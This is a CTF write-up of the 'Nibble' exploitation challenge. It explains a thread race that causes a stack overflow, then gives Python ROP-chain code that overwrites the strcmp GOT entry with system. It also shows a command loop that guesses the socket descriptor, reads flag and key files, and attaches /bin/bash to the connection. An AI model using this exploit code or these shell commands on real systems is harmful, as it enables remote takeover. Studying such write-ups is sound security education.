The recent Nuit Du Hack CTF Quals were mostly web, crypto and forensics-oriented, with no tasks explicitly categorized as "Exploitation" or "Pwning", my favourite kind. However, a brief investigation showed that the "Nibble" challenge, marked as "Misc" and worth 600 points, was in fact an exploitation task, and quite an interesting-looking one. I immediately allocated it to myself and started looking into the provided files: an x86 ELF server binary (NibbleServer) and a set of Python client scripts (NibbleClient.tar.gz). By providing the latter, the organizers made it extremely easy to understand the overall logic of the system, which is as follows:
- The client creates a chat_protocol_pb2.AuthPacket protocol buffer object, fills out its only field (a string) with the user-supplied name and sends it to the server (following a trivial protocol).
- The server replies with a chat_protocol_pb2.TokenResponse protobuf containing a 7-letter pseudo-random authentication token assigned to the username.
- The client can then send a chat_protocol_pb2.ChatMessage structure, containing a cookie (being the previously received token), nickname and the message.
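The "trivial protocol" is not spelled out here, but the exploit code later in this write-up frames a ChatMessage as a little-endian 32-bit length, followed by a one-character prefix ("2") and the serialized protobuf. Below is a minimal sketch of that framing. The helper name frame_packet is hypothetical, and the prefix used for an AuthPacket is not given in this write-up, so it is left as a parameter:

```python
import struct

def frame_packet(packet_type, payload):
    """Prefix a one-byte packet tag and a serialized protobuf with their length.

    Layout (as used for ChatMessage later in this write-up):
    <u32 little-endian length><tag byte><protobuf bytes>
    """
    data = packet_type + payload
    return struct.pack('<I', len(data)) + data

# Example: the "2" tag with a stand-in 3-byte payload instead of a real protobuf.
framed = frame_packet(b"2", b"abc")
```

The length field covers the tag byte as well as the payload, which matches how the exploit computes len(data) after prepending "2".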
At this point, it was clear we were dealing with a trivial implementation of a chatroom, which could be further confirmed by running the server and clients locally:
Now, the interesting thing about the server is how it is implemented internally: for each connection, the server creates a new thread (using pthread_create), maintains a list of structures describing all active connections, and walks that list whenever any of the clients sends a new message:
This is an interesting design decision, as it results in all clients being handled by code running in the same address space, meaning that access to any shared resources (such as global variables) should be properly synchronized.
If we look further into start_routine (the connection handling function) and into the implementation of the authorization code, and spend a few minutes adjusting variable types and names, we should end up with the following representation of the function at 0x8049b29:
Here, you can see that the server deserializes the AuthPacket protocol buffer, assigns a pointer to the provided username to a global variable (username), then if the length of the string is not more than 100, it invokes a cryptic process_username function using the pointer saved in a global variable after a short, artificial delay of 10ms. If we then look into process_username, everything becomes clear:
Because of the multithreaded design of the application and the lack of synchronization protecting access to the global username pointer, we can take advantage of a time-of-check-time-of-use (TOCTOU for short) condition to force a stack-based buffer overflow in the process_username routine by having several threads continuously send packets containing short and long strings, alternately. Once we do this on a local machine, the server should crash in the following manner within a fraction of a second:
Running as j00ru
[New Thread 0xf7cbab40 (LWP 11929)]
[New Thread 0xf74b9b40 (LWP 11932)]
[New Thread 0xf6cb8b40 (LWP 11934)]
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xf6cb8b40 (LWP 11934)]
0x41414141 in ?? ()
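The race itself can be modelled in a few lines of Python. This is only a sketch of the check-then-use sequence described above, not the decompiled server code: the names handle_auth and race_once are hypothetical, and the delay is stretched well beyond the server's 10ms so that the interleaving is reproducible.

```python
import threading
import time

MAX_LEN = 100
username = None  # shared by all threads, with no lock around it

def handle_auth(name, used_lengths, delay):
    """Model of the server's logic: store, check, wait, then use the global."""
    global username
    username = name                         # store in the shared global
    if len(username) <= MAX_LEN:            # time of check
        time.sleep(delay)                   # stands in for the 10 ms delay
        used_lengths.append(len(username))  # time of use: the global is re-read

def race_once(delay=0.2):
    """Force one bad interleaving and return the lengths that were 'used'."""
    used_lengths = []
    short = threading.Thread(target=handle_auth,
                             args=("A" * 8, used_lengths, delay))
    short.start()
    time.sleep(delay / 4)                   # let the short name pass its check
    # The long name fails its own check, but it still replaces the global.
    handle_auth("B" * 300, used_lengths, delay)
    short.join()
    return used_lengths

print(race_once())
```

The only length recorded is 300: the thread that validated the 8-character name ends up processing the 300-character one, which is exactly the situation that overflows the fixed-size stack buffer in the real server.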
As the checksec.sh script informs us, the binary has NX enabled, but RELRO, stack cookies and PIE disabled. This means that we cannot directly execute a shellcode of our choice from e.g. the stack - however, we can easily intercept the control flow, create ROP chains of our choice without any information leaks from the service and freely tamper with the import table of the executable.
In this situation, we would typically ROP our way to system("/bin/sh"); the system function itself is present in .got.plt, but we didn't have any controlled string in static memory, and at the time, we didn't notice a pointer to our string (in fact, to the protocol buffer) stored on the stack, as demonstrated in another public exploit. We could try to create a ROP chain to overwrite one of the .got entries and terminate the local thread through pthread_exit; however, we were not able to find sufficient gadgets in the small binary (this is not to say there aren't any). Yet another way would be to overwrite .got by using the recv function to read into the desired memory area from our socket - however, this would require us both to know the socket's file descriptor number (given that there were multiple connections established by a number of CTF participants, it was not easily guessable) and to put binary zeros on the stack, which the unsafe sprintf wouldn't allow us to do.
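The zero-byte restriction is easy to check mechanically. Here is a minimal sketch, assuming the overflow copies the username as a C string, so that the copy stops at the first zero byte; the helper name survives_string_copy is hypothetical, and 0x8048ca0 is the strcpy stub address used in the exploit later in this write-up:

```python
import struct

def survives_string_copy(chain):
    """True if no byte of the chain would terminate a C string copy early."""
    return b"\x00" not in chain

# A code address from this binary packs into four non-zero bytes...
strcpy_plt = struct.pack('<I', 0x8048ca0)
# ...whereas a small integer argument, such as a socket descriptor or a
# recv() length, always carries zero bytes in its upper positions.
small_fd = struct.pack('<I', 4)
```

This is why a chain made only of addresses inside the binary works, while a recv(fd, buf, len, 0) frame would be cut off at its first small argument.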
In this setting, we came up with and decided to use a technique specific to the NibbleServer executable. If we look at the layout of the .got.plt section, we can see the following:
.got.plt:0804B134 __errno_location
.got.plt:0804B138 sprintf
.got.plt:0804B13C srand
.got.plt:0804B140 pthread_exit
.got.plt:0804B144 __gmon_start__
.got.plt:0804B148 realloc
.got.plt:0804B14C recv
.got.plt:0804B150 system
.got.plt:0804B154 listen
.got.plt:0804B158 protobuf_c_message_get_packed_size
.got.plt:0804B15C __libc_start_main
.got.plt:0804B160 htons
.got.plt:0804B164 __assert_fail
.got.plt:0804B168 perror
.got.plt:0804B16C usleep
.got.plt:0804B170 free
.got.plt:0804B174 accept
.got.plt:0804B178 socket
.got.plt:0804B17C strlen
.got.plt:0804B180 protobuf_c_message_free_unpacked
.got.plt:0804B184 strcpy
.got.plt:0804B188 protobuf_c_message_pack_to_buffer
.got.plt:0804B18C bind
.got.plt:0804B190 pthread_detach
.got.plt:0804B194 protobuf_c_message_unpack
.got.plt:0804B198 protobuf_c_message_pack
.got.plt:0804B19C close
.got.plt:0804B1A0 time
.got.plt:0804B1A4 malloc
.got.plt:0804B1A8 pthread_create
.got.plt:0804B1AC send
.got.plt:0804B1B0 puts
.got.plt:0804B1B4 setsockopt
.got.plt:0804B1B8 rand
.got.plt:0804B1BC bzero
.got.plt:0804B1C0 __gxx_personality_v0
.got.plt:0804B1C4 _Unwind_Resume
.got.plt:0804B1C8 strcmp
.got.plt:0804B1CC exit
Out of those, there are two functions which are passed attacker-supplied strings as their first parameters: strlen and strcmp; we would ideally like to overwrite one of them with the address of system. While we have neither "read from" and "write to" ROP primitives nor a function like memcpy, we still have strcpy!
Let's consider our options: if we do:
strcpy(&got.strlen, &got.system);
we would instantly trash all .got entries past the address of strlen (everything from 0x804b180 onwards), likely crashing the process on the first attempt to use any of the destroyed addresses. Doing:
strcpy(&got.strcmp, &got.system);
sounds like a much better idea: in that case, the only other .got entry we overwrite is exit (with the address of listen), which is not much of a deal given that the process isn't actively terminating at the time of exploitation. However, we are still trashing the .data contents that follow .got.plt. In order to mitigate this and minimize the number of bytes overwritten past the strcmp pointer, we can insert a \0 byte into one of the .got entries after the system item, in order to make the &got.system "string" look shorter to strcpy. It's best that the function whose entry we damage with the nul byte is never used again, and when we take another look at the GOT layout, we can see that __libc_start_main at 0x804b15c is a perfect candidate: it is only called at the beginning of process execution and its entry starts just 12 bytes after the system entry at 0x804b150, with only two other entries in between. The \0 can be injected using strcpy again, with the source parameter set to a zeroed-out memory area, such as 0x804b1d4 (inside of .data):
strcpy(&got.__libc_start_main, 0x804b1d4);
After the two strcpy calls, the memory layout around GOT is as follows:
.got.plt:0804B134 __errno_location
.got.plt:0804B138 sprintf
.got.plt:0804B13C srand
.got.plt:0804B140 pthread_exit
.got.plt:0804B144 __gmon_start__
.got.plt:0804B148 realloc
.got.plt:0804B14C recv
.got.plt:0804B150 system
.got.plt:0804B154 listen
.got.plt:0804B158 protobuf_c_message_get_packed_size
.got.plt:0804B15C \0 ibc_start_main
.got.plt:0804B160 htons
.got.plt:0804B164 __assert_fail
.got.plt:0804B168 perror
.
.
.
.got.plt:0804B1BC bzero
.got.plt:0804B1C0 __gxx_personality_v0
.got.plt:0804B1C4 _Unwind_Resume
.got.plt:0804B1C8 system
.got.plt:0804B1CC listen
.data:0804B1D0 protobuf_c_message_get_packed_size
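The effect of the two strcpy calls can be double-checked on a byte-level model of this memory region. The sketch below uses the addresses from the listings, but the pointer values are placeholders (distinct, free of zero bytes), the bytes of .data after the GOT are assumed to be zero, and the helper names are hypothetical:

```python
BASE = 0x804b134       # first .got.plt entry in the listing
GOT_END = 0x804b1d0    # first address after the exit entry
MEM_END = 0x804b1e0    # assumed: a few zeroed bytes of .data after the GOT

SYSTEM, LISTEN, LIBC_START_MAIN = 0x804b150, 0x804b154, 0x804b15c
STRCMP, EXIT, ZEROED = 0x804b1c8, 0x804b1cc, 0x804b1d4

def make_memory():
    """Model memory with a distinct NUL-free placeholder pointer per GOT slot."""
    mem = bytearray(MEM_END - BASE)
    for i, addr in enumerate(range(BASE, GOT_END, 4), start=1):
        mem[addr - BASE:addr - BASE + 4] = bytearray([i, 0x10 + i, 0xe0, 0xf7])
    return mem

def strcpy(mem, dst, src):
    """Copy bytes up to and including the first NUL; return the byte count."""
    copied = 0
    while True:
        byte = mem[src - BASE + copied]
        mem[dst - BASE + copied] = byte
        copied += 1
        if byte == 0:
            return copied

def slot(mem, addr):
    """Return the 4 bytes stored in the slot at addr."""
    return bytes(mem[addr - BASE:addr - BASE + 4])

mem = make_memory()
first = strcpy(mem, LIBC_START_MAIN, ZEROED)   # plants a single NUL byte
second = strcpy(mem, STRCMP, SYSTEM)           # three entries plus the NUL
print(first, second, slot(mem, STRCMP) == slot(mem, SYSTEM))
```

In this model the first call writes 1 byte and the second writes 13: the system, listen and protobuf_c_message_get_packed_size pointers land at 0x804b1c8, 0x804b1cc and 0x804b1d0, and the terminating nul falls on 0x804b1d4, which was zero to begin with.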
Since we're up against a race condition, we don't know exactly when we hit the right timing and .got becomes overwritten - therefore, we would like to keep the process alive at all times by preventing any kind of unnecessary exceptions. To make this happen, we terminate the current thread cleanly via pthread_exit. The overall ROP chain formed in Python looks as follows:
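import struct

# Return address placed after each call. Judging by the frame layout below,
# it points at a gadget that skips the arguments and filler (an assumption).
padding_addr = 0x8049d42

def rop_strcpy(dst, src):
    """One chain frame that calls strcpy(dst, src) through its PLT stub."""
    strcpy_jmp = 0x8048ca0
    return (struct.pack('<I', strcpy_jmp) +
            struct.pack('<I', padding_addr) +
            struct.pack('<I', dst) +
            struct.pack('<I', src) +
            b"A" * 0x24)

def rop_pthread_exit(exitcode):
    """Final frame: end the current thread with pthread_exit(exitcode)."""
    pthread_exit_jmp = 0x8048b90
    return (struct.pack('<I', pthread_exit_jmp) +
            struct.pack('<I', padding_addr) +
            struct.pack('<I', exitcode))

def rop():
    nul_data_address = 0x804b1d4     # zeroed memory inside .data
    libc_start_main_got = 0x804b15c
    system_got = 0x804b150
    strcmp_got = 0x804b1c8
    # Plant a NUL after the system entry, then copy system over strcmp.
    return (rop_strcpy(libc_start_main_got, nul_data_address) +
            rop_strcpy(strcmp_got, system_got) +
            rop_pthread_exit(0xdeadbeef))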
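When debugging a chain like this, it can help to unpack it back into 32-bit words and compare them against the intended frame layout. A small sketch follows; the helper name chain_words is hypothetical, and the frame is rebuilt by hand from the addresses in the listing above rather than taken from a real run:

```python
import struct

def chain_words(chain):
    """Split a ROP chain into little-endian 32-bit words."""
    assert len(chain) % 4 == 0, "chain must be a whole number of words"
    return list(struct.unpack('<%dI' % (len(chain) // 4), chain))

# One strcpy frame: stub address, return address, dst, src, 0x24 filler bytes.
frame = (struct.pack('<4I', 0x8048ca0, 0x8049d42, 0x804b1c8, 0x804b150) +
         b"A" * 0x24)

for index, word in enumerate(chain_words(frame)):
    print("+0x%02x: 0x%08x" % (index * 4, word))
```

Each strcpy frame is 13 words (0x34 bytes) long, so the next frame's first word should show up at offset +0x34 in a dump of the complete chain.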
However, if we try to use the above payload in our exploit using the original chat_protocol_pb2.py protocol buffer implementation provided by the organizers, we will encounter the following error:
It turns out that the username field in the AuthPacket message was defined as type "string", which only accepts correctly encoded textual strings. In order to work around this, we have to rewrite the protocol buffer definitions on our own, changing the field's type from "string" to "bytes":
package NibblesChat;

message AuthPacket {
  required bytes username = 1;
}

message ChatMessage {
  required string cookie = 1;
  required string nickname = 2;
  required string textmessage = 3;
}
and compile it locally to create a new chat_protocol_pb2.py file:
$ protoc chat_protocol.proto --python_out=.
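The underlying problem can be reproduced without protobuf at all: packed addresses are arbitrary bytes, and most of them do not form valid text, which is what a "string" field requires. A minimal sketch using only the standard library; the helper name is_valid_utf8 is hypothetical, and the exact check and exception used by the protobuf bindings may differ:

```python
import struct

# The strcpy stub address from the ROP chain, packed as it appears in the payload.
raw = struct.pack('<I', 0x8048ca0)   # b'\xa0\x8c\x04\x08'

def is_valid_utf8(data):
    """True if the bytes decode as UTF-8, i.e. would fit a text field."""
    try:
        data.decode('utf-8')
        return True
    except UnicodeDecodeError:
        return False
```

Here is_valid_utf8(raw) is False because 0xa0 cannot start a UTF-8 sequence, while an ordinary nickname such as b"j00ru" passes; a "bytes" field performs no such validation.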
With this sorted out, our exploit can now successfully overwrite strcmp with system:
(gdb) x/1wx 0x804b150
0x804b150 <system@got.plt>: 0xf7fb7e10
(gdb) x/1wx 0x804b1c8
0x804b1c8 <strcmp@got.plt>: 0xf7fb7e10
(gdb) x/1i 0xf7fb7e10
0xf7fb7e10 <system>: push %ebx
Hurray! We now have the ability to execute arbitrary commands on the remote server via the ChatMessage packet, which contains a string passed directly as the first parameter to the overwritten strcmp. However, all attempts to spawn a reverse shell via netcat and other traditional methods failed. Normally, we would invoke a "/bin/sh <&4 >&4" command to have the shell's standard input and output redirected to our socket at a known fd; in this case, however, we don't know the numeric value of the socket's descriptor. Luckily, the standard strcmp function is called using the __cdecl convention, in which the caller cleans up the arguments, meaning that a mismatch in the number of parameters between strcmp and system does not misalign the stack and crash the application. Therefore, we have an unlimited number of attempts to guess the fd, which we did using the following code:
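import struct
import chat_protocol_pb2  # regenerated with the "bytes" username field

# s is the already connected socket to the server.
for i in range(1, 100):
    # Try file descriptor i: print a marker, dump likely flag files, then
    # attach a shell to that descriptor.
    msg = chat_protocol_pb2.ChatMessage()
    msg.cookie = "echo test >&%u; cat fla* ke* ~/fla* ~/ke* >&%u; /bin/bash <&%u >&%u" % (i, i, i, i)
    msg.nickname = "j00ru//drgns"
    msg.textmessage = "pwned."
    # "2" prefix (apparently the ChatMessage packet tag) + serialized message.
    data = b"2" + msg.SerializeToString()
    s.send(struct.pack('<I', len(data)) + data)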
While we had the exploit ready fairly soon after we started working on the task, the service was overloaded at the time of the CTF, with multiple teams attempting to solve it and crashing the process before anyone could grab the flag (hell, my exploit probably contributed to the situation a lot). After two tedious hours, our console finally spat out the flag and provided us with remote shell access to the vulnerable box: